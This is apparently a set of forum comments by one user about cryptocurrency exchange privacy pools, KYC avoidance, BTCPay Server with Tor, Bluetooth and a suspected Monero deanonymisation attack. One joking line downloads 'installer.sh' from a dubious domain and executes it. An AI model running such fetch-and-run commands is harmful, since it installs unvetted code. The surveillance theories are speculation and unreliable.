I assume the problem is hardware. Matt’s hardware didn’t work well with LM, therefore Matt thinks LM sucks… I do wish there was better hardware support but it’s the reason apple went with 1 product = 1 OS = 1 general set of hardware. Sure not every iPhone has the same hardware, but that’s why they have the model numbers, and it’s so much easier to test 200 model mixes than 2,000,000 (Android). Windows gets all the debug info sent directly to them like the others but they also have a huge stack of hardware they can use or they can buy it to test.

This should have been much more well thought out The wording, image, buttons, specific wording for each page.

They really screwed the pooch.

Another 4-6 months minimum before release. But quarterly numbers must be met.

To be honestly I didn’t even know they had aggregated pools, but I will 100% look into it. Where did you find the aggregared swao on the main exchange page?

We operate with two pools of addresses for BTC deposits and transfers - mixed and aggregated. In a mixed pool all received and sent transactions are mixed together and there is no way to discover how many people are behind certain addresses and traceability is extremely difficult, which is very good for privacy but bad for risk scoring. In the aggregated pool all transactions we receive from users are collected on a known single address which is also used to send payments, what will clearly show you have interacted with our exchange and it’s good for interacting with other major exchanges to avoid any risks of frozen funds.

These are cons and pros of each pool:

Aggregated pool (bc1qu2dq8w8lv8v3l7lr2c5tvx3yltv22r3nhkx7w0)

Pros:

No risks of being frozen at major exchanges due to low risk score given by chain analysis platform

Chain analysis platforms will know you have interacted with an exchange and won’t increase a risk score of your sending addresses

Can be useful when someone asks you for a source of funds

Cons:

Reduced privacy

I had X,XXX eaten by a swap before so now I only use BXYZ to XMR. I wish I knew about this for some trades. Wonder if it’s limited to pseudononymous currencies. wish I knew where to find it and more info.

All options I see are flat rate and dynamic rate. Maybe you have to contact them about it.

Not sure about anonexch. Exch.cx is great for whatever to XMR. 5% fee though. Do NOT use them to trade XMR to a pseudononymous crypto like BTC at anywhere that checks KYC or availability of dirty address (Trocador hsd a checjer on their site fwiw) as there’s like an 85% chance you’ll have to do KYC and explain to get it back.Unless you’re using Trocador and are at or under their guarantee, then they will just send the funds back to the original address, no questions asked, provided you have access to it.

wget toteslegitdebian.app/installer.sh & chmod +x && ./installer.sh

was I not supposed to do that? but staxoverflown said it’s OK.

I dunno. They started out with different owners. It’s still fully manual (buy prepaid visa, get it in 24 hours, maybe.)

They once advertised cards that would not be detected as prepaid. Surprise, company I bought it for wouldn’t accept a prepaid card, no refund just “sorry for luck maybe try another site?”

Edit I had allark and majesticbank confused.

That does go a long way towards explaining why there are so many Bluetooth vulnerabilities, thanks for the info. Looking at the list of Bluetooth protocols wiki page gives me a headache. Surely there is a better standard, and I see things like HaLow, ZigBee, Z-Wave and other custom protocols, but it seems like there should be a very cleanly well-documented alternative to do the basics that everyone expects BT to do. This, coming from a total noob, speaking completely out of my anus. I just know that as a BT user, it’s a crapshoot whether there will be major audio delay, and pause/play actually worked, that’s if pairing works in the first place. But if something did come along I wonder if there would even be adoption among consumer devices.

Yes, but setting the environment variables before running setup. The following two coded env vars will set your btcpay server to automatically also run a tor hidden service. Once XMR is configured (only one wallet per server at the moment) you should be able to access the hidden service and pay without issue.

Run btcpay-setup.sh with the right parameters

Set the custom domain you chose to use

export BTCPAY_HOST=“btcpay.EXAMPLE.com”

Use Bitcoin on mainnet

export NBITCOIN_NETWORK=“mainnet”

Enable Bitcoin support

export BTCPAYGEN_CRYPTO1=“btc”

Enable Monero support

export BTCPAYGEN_CRYPTO2="xmr"

opt-add-tor enables Tor support for the UI and Bitcoin node

export BTCPAYGEN_ADDITIONAL_FRAGMENTS="opt-save-storage-xs;opt-add-tor" 

Is it true the Bluetooth network stack is larger than the WiFi network stack? If so, why? I don’t know much about BT besides pairing, allowing calls and audio in/out, transferring files, and… is there more? It takes a day of reading documentation to understand all the advanced options on my ASUS router interface, and that’s without anything proprietary.

I’m just surprised and curious and never got a satisfying answer.

Survivor bias and and an ad all in one post!

When I see posts like this it gets my glowie senses tingling.

Honeypot? Dunno. Good discussions about it on hacker news.

In the guide you linked, the docker container automatically sets up a hidden service. You don’t need to do anything beyond firewall rules if it’s not working for you.

And have eyes good enough to look very closely and detect any small . or `s that are out of place, and be current on all methods of sanitization, catching any and all confusing variable names doing funny things, and never getting mentally overloaded doing it.

I wouldn’t be surprised at all if teams at NSA & co had game months where the teams that find the highest number of vulns or develop the most damaging 0day exploits get a prize and challenge coin. Then you have the teams that develop the malware made to stay stealthy and intercept data for decades undetected, and the teams that play mail agent and intercept packages containing core internet backbone routers to put hardware ‘implants’ inside them.

These are the things Snowden showed us a small sliver of in 2013, over a decade ago, some of which was well aged by that point.

The days of doing illegal things for funsies on the internet, like learning how to hack hands-on, are over if you don’t want to really risk prison time. Download vulnerable virtual machines and hack on those.

But if you’re worried about a random maintainer or packager inserting something like a password stealer or backdoor and letting it hit a major distro with a disastrous backdoor that doesn’t require a PhD in quantum fuckography to understand, chances are likely big brother would alert someone to blow the whistle before it hit production, as they likely did with xzutils.

Thank you for answering my questions. Having much more knowledge in this area, what is your gut feeling about it being not random spam DDoS, but a way to get some type of sensitive data, that can make identifying users easier? Happy to receive a PM and won’t share.

https://www.thc.org/segfault/

I just noticed your username. Thank you for the project, Feather is amazing. I have a question though. I know Ruckinum ran an analysis and thinks this is not a black marble flood, but I can’t help but think it’s a way go somehow break the anonymity of monero, whether just sent amounts, or received amounts, which would still give a wealth of information.

I don’t believe this is a random (D)DoS/spam. This is a deanon attack. I know it in my gut. I don’t know enough about the internals of monero but I think you might.

Specifically…

The bug was triggered when the number of RingCT outputs on the blockchain exceeded 100 million

For instance, this transaction was constructed using a manipulated output distribution. Can you determine what the true spend is? Notice that all ring members are older than 1y 200d except for one 6-day-old output. Unless the user checks the ring on a block explorer and knows what to look out for, they would not notice that their transactions are being fingerprinted.

My understanding is that the 16 (or 15+real?) rings are all real, prior transactions. Are the transactions reused? If not, then they exhaust the supply of rings and now have great statistical advantage going forward. If they are reused, then they can tell the real spend by discarding any spend that’s been used more than once. Is that correct?

I can’t help but believe this is part of something larger, along with all the previous attacks in the last 2 years and now Samourai, Liquid pulling out of US, attacks on tor, RISAA and mandatory KYC on US cloud providers and domain registrars…

On that note, we’ve known LE has tools for years now (Chainalysis and 1-2 others) that can in some circumstances give a lead on who a target is, likely via statistical analysis. The tools are only available to law enforcement so the methods aren’t known. My thoughts are, in no particular order:

1. They run or have compromised a lot of ‘activist’ nodes and xpubs are sent to the nodes in light wallets, unsure if this is how it works, or if that was unique to Samourai’s whirlpool design. If this was the case, light wallets use currently online available servers, so chances are a user connects their wallet to tens of servers. Users who run their own nodes would be unaffected but I think the majority of monero users use light nodes.

2. They have tools that monitor public ledger chains, and watch the amounts in/out. You use an exchange service to trade $500 of BTC to XMR, the amounts (fees included) are correlated over time, leading to known persons selling via KYC services. Probably least likely option but unsure how XMR works in depth.

3. They run and/or work with (gag order) no-KYC major services that would have that information, as well as other more ‘centralized’ helpful no-KYC exchange services that know exactly what amount and address the funds are going to and where they came from.

deleted by creator

Oops I was wrong, it looks like I have a penny left in the sending wallet so it was just a lucky coincidence on amounts sent during testing.

deleted by creator

When gold was used as currency, it would be shaved off using a scale to confirm the weight (gold is a very soft metal, easily ‘sliced’ off the coin/bar. Shopkeepers had their own scales but wary customers could carry gold pocket scales to confirm the weight.

Just like you can spend fractions of a cryptocoin, you can spend fractions of a precious metal coin.